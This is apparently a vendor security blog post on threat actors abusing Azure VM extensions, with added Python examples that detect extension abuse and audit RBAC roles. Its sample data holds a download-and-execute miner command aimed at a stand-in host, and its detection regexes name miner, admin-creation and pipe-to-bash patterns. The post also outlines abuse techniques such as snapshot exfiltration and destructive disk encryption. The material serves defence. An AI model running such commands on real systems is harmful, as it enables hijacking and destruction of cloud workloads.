Throughout recent years, the IT world has shifted its workloads, management layers, and machines to the cloud, introducing a new attack surface accompanied by new attack vectors. This shift has also given threat actors new ways to attack organizations' cloud environments, gain strong permissions, operate for financial gain, and more.
Once they have compromised an identity with sufficient permissions in Azure, threat actors often try to abuse existing features of the environment that let them deploy their malicious activity stealthily, efficiently, and easily. One such feature is Azure VM extensions.
Announcing new detections and alerts against extension abuse
Today, building on extensive research and monitoring, we are announcing new and enhanced protection capabilities against extension abuse, offered by Microsoft Defender for Cloud as part of the Microsoft Defender for Servers plan 2 offering, and explaining why this protection matters.
Our customers can enjoy the protection capabilities effortlessly, without the need to manually deploy a dedicated agent on the VM.
Azure virtual machine extensions
Azure virtual machine extensions are small applications that provide post-deployment configuration and automation on Azure VMs, such as software updates, code and script execution, antimalware deployments, and more.
VM extensions play an instrumental role in workload management and VM maintenance. Many organizations' cloud environments depend on extensions' capabilities, such as automated configuration deployment, security management, continuous monitoring, troubleshooting, and log analytics.
On the other hand, extensions can be abused as a powerful cloud-native tool by threat actors who have gained an initial foothold in the victim's Azure environment. Because deploying an extension depends solely on Azure RBAC permissions, threat actors can abuse VM extensions to execute operations with high privileges and perform stealthy and destructive cyber-attacks.
In this blog, we will discuss the various extensions, what makes each of them unique, the corresponding MITRE techniques associated with them that are abused in the wild and researched in the security world, and introduce Microsoft Defender for Cloud's new series of alerts that combat this abuse.
The following extensions allow different kinds of data collection and monitoring over network traffic, resource data, diagnostics, analytics, and more.
- Network Watcher allows threat actors to capture network traffic, analyze packets, verify IP flow, and diagnose network security groups (NSGs).
The Network Watcher tool can be invaluable for advanced threat actors looking to learn about the environment's topology and identify weaknesses in the victim's cloud environment by:
  - Understanding the structure of the environment's security framework.
  - Using IP flow verify to determine which packets are allowed and thereby find exposed resources.
  - Analyzing existing NSGs to determine how to manipulate them to gain access and then persistence.
- Azure Monitor allows threat actors to create data collection rules over resources, in order to capture various kinds of machine logs and events.
Capturing Windows events of different kinds, such as security, system, and application logs, can be of high importance for threat actors gathering information about the compute running inside the environment.
This can be done by creating a dedicated Log Analytics workspace that consumes the logs from the Azure Monitor agent on the VM.
- VMSnapshot allows threat actors to capture VM disk snapshots as part of the Azure Backup service.
Through Microsoft's extensive research and investigation of recent sophisticated attacks, evidence has shown that not only do threat actors attempt to reset passwords and gain access and persistence to VMs by leveraging the VMAccess extension (which will be discussed later on), they also attempt to capture disk snapshots of VMs that capture their interest during the initial phases, by leveraging Azure Backup service capabilities.
Capturing disk snapshots allows threat actors to export critical data from the VM's disks during a short window of time, to a local or remote location, using a dedicated URL for downloading, or copying the disk to another location in the environment. After that, threat actors will attempt to attach the snapshots of the disks to their own controlled machines, after configuring them to the right format.
Azure VM extensions offer a variety of ways for code execution and running scripts as SYSTEM/sudo on your virtual machines, thus providing threat actors with a powerful tool to facilitate deployments of their different attack techniques, at scale:
Run Command uses the VM agent to run scripts on the VM, as SYSTEM/sudo.
It can be abused in a variety of ways, from running recon commands to learn about the victim's cloud environment, creating local admin users for persistence, to downloading payloads on the machine, executing crypto miners for impact, and more.
The Custom Script Extension (CSE) allows the user to download and run a script on the VM, as SYSTEM/sudo.
CSE can be used to deploy different attack vectors at scale, especially when looking to run the same script across different VMs within a virtual machine scale set (unlike Run Command).
As an example, Microsoft witnessed the following techniques being abused by a threat actor:
- Password Spraying campaign
- Threat actor successfully gains initial access to user accounts in Azure.
- Mass compute resource creation
- Threat actor sets up the crypto mining environment with the needed network resources.
- Mass deployment of XMRig software on all compute using Custom Script Extensions to initiate the crypto mining campaign.
The Desired State Configuration (DSC) extension uploads and applies a DSC configuration on the VM.
Using DSC, threat actors can maliciously deploy scheduled tasks, apply configurations, and execute scripts, resulting in the deployment of a backdoor, connection to a C2 (Command and Control), extracting the VM managed identity, and more.
The VMAccess extension allows the user to manage administrative users and reset access on Azure VMs.
Threat actors often abuse the VMAccess extension to gain access to VMs inside the victim's environment, after they gain initial foothold, by resetting passwords, SSH keys, and manipulating the admin users in the VM.
As a result, they can choose their target wisely inside the environment and gain access to it using only the cloud-native RBAC roles needed to execute the extension, and go on to discover sensitive information and disrupt critical workloads inside the environment.
[Screenshot in the original post: the newly created user successfully running commands as sudo.]
The GPU driver extension provides the ability to install NVIDIA or AMD GPU drivers on supported, GPU-equipped Azure VMs, in order to take full advantage of the card's capabilities.
Threat actors can leverage this capability to deploy a GPU driver on supported Azure VMs in the victim's Azure environment and follow up with the installation of crypto mining software by leveraging the Custom Script Extension, or any other technique, and move on to the mining phase.
Azure Disk Encryption uses BitLocker to provide full disk encryption on Azure virtual machines.
Threat actors can abuse this extension by encrypting the disks of the VMs in the victim's cloud environment that capture their interest, with the goal of rendering all data permanently inaccessible by then deleting the encryption key or the key vault that contains it.
In such cases, it is crucial for the victim to be aware of purge protection and the other protection measures Microsoft provides to delay or prevent the deletion of the encryption key.
After going through the abuse scenarios for the variety of VM extensions, we will dive into Microsoft's new detection capabilities and techniques, and how we defend our customers through continuous monitoring and analysis of suspicious signals, from the control plane to the endpoint.
Not only does the new series of detections target a wide range of abuse techniques, but it also targets a wide range of extension abuse types, to protect our customers against attack vectors that emerge.
Through extensive research, we have identified the suspicious signals for which the likelihood of a breach is high. By studying user behavior and monitoring for these signals, we are able to detect suspicious activity. Some of the signals are the following:
- Usage of VM extensions by a user account which hasn't used any VM extensions recently.
- A sudden surge in extension usage by a suspicious user account, which might indicate a post-breach reconnaissance, impact, or persistence activity.
- Code or script execution containing parts that indicate a malicious intent.
- Usage of a combination of extensions in a short time window, which might indicate a recon attempt.
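As an added example (not part of the original post, and not Defender for Cloud's own detection logic), the following Python sketch implements the four signals listed above over activity-log-style records. The record layout is a simplification of Azure Activity Log entries; the two operation names are the Azure RBAC operations for extension writes and Run Command; all callers, timestamps, extension type names and script contents are constructed for the example, and the baseline set of callers is assumed to come from a longer historical query.

```python
"""Constructed detector for the four extension-abuse signals (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Control-plane operations that deploy code through the VM agent.
EXTENSION_OPERATIONS = {
    "Microsoft.Compute/virtualMachines/extensions/write",
    "Microsoft.Compute/virtualMachines/runCommand/action",
}

# Script fragments matching the abuse cases described in the post:
# miner deployment, local admin creation for persistence, download-and-execute.
SUSPICIOUS_SCRIPT_PATTERNS = [
    re.compile(r"xmrig", re.I),
    re.compile(r"net\s+user\s+\S+\s+\S+\s+/add", re.I),
    re.compile(r"net\s+localgroup\s+administrators\s+\S+\s+/add", re.I),
    re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b.*\|\s*(sh|bash|iex)\b", re.I),
]


def parse_ts(value):
    """Parse an ISO-8601 timestamp with a trailing Z into an aware datetime."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def detect(events, baseline_callers, surge_threshold=5,
           surge_window=timedelta(minutes=10), combo_min_types=3,
           combo_window=timedelta(minutes=30)):
    """Return (signal, caller, detail) tuples; each signal fires once per caller."""
    alerts = []
    ext_events = sorted((e for e in events if e["operationName"] in EXTENSION_OPERATIONS),
                        key=lambda e: parse_ts(e["time"]))
    by_caller = defaultdict(list)
    for event in ext_events:
        by_caller[event["caller"]].append(event)

    for caller, evs in by_caller.items():
        times = [parse_ts(e["time"]) for e in evs]

        # Signal 1: a caller with no extension usage during the baseline period.
        if caller not in baseline_callers:
            alerts.append(("first_extension_use", caller, evs[0]["time"]))

        # Signal 3: script content that indicates malicious intent.
        for event in evs:
            hits = [p.pattern for p in SUSPICIOUS_SCRIPT_PATTERNS
                    if p.search(event.get("script", ""))]
            if hits:
                alerts.append(("suspicious_script", caller, hits[0]))

        # Signals 2 and 4: sliding windows over the caller's time-sorted events.
        reported = set()
        start_surge = start_combo = 0
        for end in range(len(evs)):
            while times[end] - times[start_surge] > surge_window:
                start_surge += 1
            count = end - start_surge + 1
            if count >= surge_threshold and "extension_surge" not in reported:
                alerts.append(("extension_surge", caller,
                               f"{count} operations within {surge_window}"))
                reported.add("extension_surge")

            while times[end] - times[start_combo] > combo_window:
                start_combo += 1
            types = {e["extensionType"] for e in evs[start_combo:end + 1]}
            if len(types) >= combo_min_types and "extension_combination" not in reported:
                alerts.append(("extension_combination", caller, sorted(types)))
                reported.add("extension_combination")
    return alerts


# Constructed sample: a known administrator updating one VM, and an account with
# no extension history rapidly chaining several extensions and a download script.
BASELINE_CALLERS = {"ops-admin@contoso.example"}
WRITE = "Microsoft.Compute/virtualMachines/extensions/write"
RUN = "Microsoft.Compute/virtualMachines/runCommand/action"


def ev(time, caller, op, ext_type, script=""):
    return {"time": time, "caller": caller, "operationName": op,
            "extensionType": ext_type, "script": script}


SAMPLE_EVENTS = [
    ev("2024-01-10T09:00:00Z", "ops-admin@contoso.example", WRITE,
       "CustomScriptExtension", "Install-WindowsUpdate -AcceptAll"),
    ev("2024-01-10T10:00:00Z", "svc-build@contoso.example", WRITE, "NetworkWatcherAgentLinux"),
    ev("2024-01-10T10:05:00Z", "svc-build@contoso.example", WRITE, "AzureMonitorLinuxAgent"),
    ev("2024-01-10T10:08:00Z", "svc-build@contoso.example", WRITE, "VMAccessForLinux"),
    ev("2024-01-10T10:10:00Z", "svc-build@contoso.example", WRITE, "CustomScript",
       "curl -s http://example.invalid/xmrig.sh | bash"),
    ev("2024-01-10T10:12:00Z", "svc-build@contoso.example", RUN, "RunCommand"),
    ev("2024-01-10T10:13:00Z", "svc-build@contoso.example", RUN, "RunCommand"),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS, BASELINE_CALLERS):
        print(alert)
```

Running the sample raises no alert for the administrator with an existing baseline, and four alerts for the second account: first-time extension use, a surge of five operations inside ten minutes, a suspicious download-and-execute script, and three distinct extension types within half an hour. The thresholds are deliberately parameters, because the right values depend on how heavily a given environment automates extension deployment.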
Identities in Azure require certain highly privileged roles to be able to use extensions. This is yet another example of how identities and permissions are the core of a cloud environment's access controls. As a result, we recommend building a strong framework based on least privilege, granting each identity only the permissions it needs to perform its dedicated and legitimate operations, in order to prevent imminent attacks.
In addition to the above, continuous monitoring and detection efforts are essential to remediate ongoing attacks and prevent possible future ones.
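To make the least-privilege recommendation concrete, here is an added Python example (not the post's own tooling and not an Azure SDK call) that audits role definitions for permissions allowing extension deployment, Run Command, or disk snapshot creation. It reproduces the Azure RBAC rule that the effective permission is Actions minus NotActions, with `*` matching across path segments. The three operation names are real Azure RBAC operations; the sample role definitions are constructed and simplified, not the exact built-in roles.

```python
"""Audit constructed Azure RBAC role definitions for extension-capable permissions."""
import re

# Control-plane operations that map to the abuse scenarios discussed in the post.
# Custom Script, DSC, VMAccess, GPU driver and Disk Encryption all arrive via extensions/write.
EXTENSION_CAPABLE_ACTIONS = [
    ("Microsoft.Compute/virtualMachines/extensions/write", "deploy or update a VM extension"),
    ("Microsoft.Compute/virtualMachines/runCommand/action", "run a script as SYSTEM/root via Run Command"),
    ("Microsoft.Compute/snapshots/write", "create a disk snapshot"),
]


def action_matches(pattern, action):
    """Azure RBAC wildcard matching: '*' matches any characters, including '/',
    so both 'Microsoft.Compute/*' and '*/read' are valid wildcard patterns."""
    regex = "^" + re.escape(pattern).replace(r"\*", ".*") + "$"
    return re.match(regex, action, re.I) is not None


def role_allows(role, action):
    """Effective permission = Actions minus NotActions (data actions ignored here)."""
    allowed = any(action_matches(p, action) for p in role.get("Actions", []))
    denied = any(action_matches(p, action) for p in role.get("NotActions", []))
    return allowed and not denied


def audit_roles(roles):
    """Return {role name: [(action, why it matters), ...]} for each role."""
    return {
        role["Name"]: [(action, why) for action, why in EXTENSION_CAPABLE_ACTIONS
                       if role_allows(role, action)]
        for role in roles
    }


# Constructed sample roles (simplified; not the real built-in definitions).
SAMPLE_ROLES = [
    {"Name": "contributor-like", "Actions": ["*"],
     "NotActions": ["Microsoft.Authorization/*/Write", "Microsoft.Authorization/*/Delete"]},
    {"Name": "reader-like", "Actions": ["*/read"], "NotActions": []},
    {"Name": "vm-operator",
     "Actions": ["Microsoft.Compute/virtualMachines/read",
                 "Microsoft.Compute/virtualMachines/start/action",
                 "Microsoft.Compute/virtualMachines/restart/action"],
     "NotActions": []},
    # Broad compute rights with extension deployment and Run Command carved out.
    {"Name": "compute-no-extensions", "Actions": ["Microsoft.Compute/*"],
     "NotActions": ["Microsoft.Compute/virtualMachines/extensions/*",
                    "Microsoft.Compute/virtualMachines/runCommand/action"]},
]

if __name__ == "__main__":
    for name, risky in audit_roles(SAMPLE_ROLES).items():
        print(name, "->", [a for a, _ in risky] or "no extension-capable permissions")
```

The contributor-like role is flagged for all three operations, the reader-like and start/restart-only roles for none, and the carved-out compute role only for snapshot creation, which shows that NotActions can remove extension rights from an otherwise broad role without rewriting it. Running the same check over the role assignments exported from a real subscription is a quick way to find identities that could deploy extensions but have no business doing so.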
With the advent and continued growth of cloud computing in Azure, many threat actors rely on techniques that make it easy to deploy malicious activity, and Azure VM extensions have become one of their targets.
As a result of in-depth research and continued monitoring, Microsoft Defender for Cloud is announcing a detection campaign to provide its customers with strong security measures for sophisticated attack vectors and threat actor campaigns targeting extensions abuse.
Learn more about VM extensions: Link
Learn more about Defender for Cloud plans: Link
Learn more about Defender for Servers plans: Link